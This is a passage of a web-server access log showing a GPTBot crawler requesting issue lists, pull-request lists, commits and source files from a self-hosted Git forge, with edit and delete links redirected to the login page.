[Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:00:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&state=open&type=all" [Client 74.7.227.38] [Length 10127] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" +[17/Feb/2026:19:00:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&state=all&type=all" +[17/Feb/2026:19:00:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&state=open&type=all" [Client 74.7.227.38] [Length 9956] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls" +[17/Feb/2026:19:00:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10073] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:00:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:00:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=source" [Client 74.7.227.38] [Length 12739] [Gzip 3.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:19:00:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=source" [Client 74.7.227.38] [Length 11669] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:19:00:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:00:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 13184] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj" +[17/Feb/2026:19:00:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:00:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:00:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:00:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fcpp%2fsrc%2fcodec.cpp" [Client 74.7.227.38] [Length 28332] [Gzip 5.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/codec.cpp" +[17/Feb/2026:19:00:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2findustrial-comm%2fcpp%2fsrc%2fold_codec.cpp" [Client 74.7.227.38] [Length 20728] [Gzip 5.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_codec.cpp" +[17/Feb/2026:19:00:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2f.cmake%2fapi%2fv1" [Client 74.7.227.38] [Length 55589] [Gzip 12.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1" +[17/Feb/2026:19:00:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fsrc-old%2fdummy.cpp" [Client 74.7.227.38] [Length 22763] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:19:00:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2f.cmake%2fapi%2fv1" [Client 74.7.227.38] [Length 62185] [Gzip 14.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:19:00:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fcpp%2fsrc%2fdummy.cpp" [Client 74.7.227.38] [Length 24873] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/dummy.cpp" +[17/Feb/2026:19:00:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2f.ninja_deps" [Client 74.7.227.38] [Length 24194] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_deps" +[17/Feb/2026:19:00:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" +[17/Feb/2026:19:00:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" +[17/Feb/2026:19:00:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" +[17/Feb/2026:19:00:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" +[17/Feb/2026:19:00:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json?display=source" [Client 74.7.227.38] [Length 13198] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" +[17/Feb/2026:19:00:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json?display=rendered" [Client 74.7.227.38] [Length 11209] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" +[17/Feb/2026:19:00:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 9851] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" +[17/Feb/2026:19:00:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 13026] [Gzip 6.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" +[17/Feb/2026:19:00:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 1916] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" +[17/Feb/2026:19:00:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 977] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" +[17/Feb/2026:19:00:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2f.ninja_log" [Client 74.7.227.38] [Length 25091] [Gzip 4.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_log" +[17/Feb/2026:19:00:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2findustrial-comm%2fcpp%2fsrc%2fcodec.cpp" [Client 74.7.227.38] [Length 29837] [Gzip 8.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/codec.cpp" +[17/Feb/2026:19:00:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fsrc-old%2fold_codec.cpp" [Client 74.7.227.38] [Length 25630] [Gzip 5.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:19:00:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2f.cmake%2fapi" [Client 74.7.227.38] [Length 55598] [Gzip 12.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api" +[17/Feb/2026:19:00:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:00:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:00:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:00:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:00:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" +[17/Feb/2026:19:00:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" +[17/Feb/2026:19:00:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" +[17/Feb/2026:19:00:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" +[17/Feb/2026:19:00:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&sort=leastupdate&state=closed&type=all" +[17/Feb/2026:19:00:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/dist" [Client 74.7.227.38] [Length 9777] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist" +[17/Feb/2026:19:00:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&state=closed&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&state=all&type=all" +[17/Feb/2026:19:00:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11658] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:19:00:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:00:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=open&type=all" +[17/Feb/2026:19:00:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:00:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:19:00:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:19:00:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:19:00:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:19:00:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:19:00:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:19:01:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:19:01:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 